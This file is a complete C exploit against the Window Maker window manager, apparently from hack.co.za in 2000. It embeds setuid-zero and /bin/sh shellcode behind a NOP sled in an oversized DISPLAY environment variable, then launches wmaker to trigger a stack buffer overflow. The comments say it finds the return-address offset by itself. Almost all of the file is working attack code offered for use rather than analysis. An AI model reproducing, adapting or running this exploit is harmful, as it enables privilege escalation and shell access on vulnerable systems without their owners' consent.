// Window Maker exploit by null
// bla bla .. i know this one's coded already and wmaker is not u+s
// but this scripie finds out the offset by itself (i.e you dont have to brute
// force it)
// tested on slack7 with wmaker 0.60.0
// null@cybernull.com
// proud LmT member
// greets to XOR

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

unsigned char shellcode[]=
  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
  // just if wmaker is u+s and /bin/sh = bash2 ;))
  "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
  "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68\x58";

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

#define NOP     0x90
#define LEN     1101
#define RET     get_sp()
#define ADR     0xbffff1c1

int main(int argc, char *argv[])
{
  char buffer[LEN];
  long retaddr = RET;
  int i, offset;
  offset = RET - ADR;
  if(argc>1) offset = atoi(argv[1]);
  retaddr = RET - offset;

  fprintf(stderr,"using address: 0x%lx offset: %d\n",retaddr, offset);

  for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;
  memset(buffer,'\x90',500);
  memcpy(buffer+500-strlen(shellcode)-1,shellcode,strlen(shellcode));
  buffer[LEN-1]='\x0';

  setenv("DISPLAY",buffer,1);
  system("/usr/X11R6/bin/wmaker");

  return 0;
}
/*                    www.hack.co.za              [2000]*/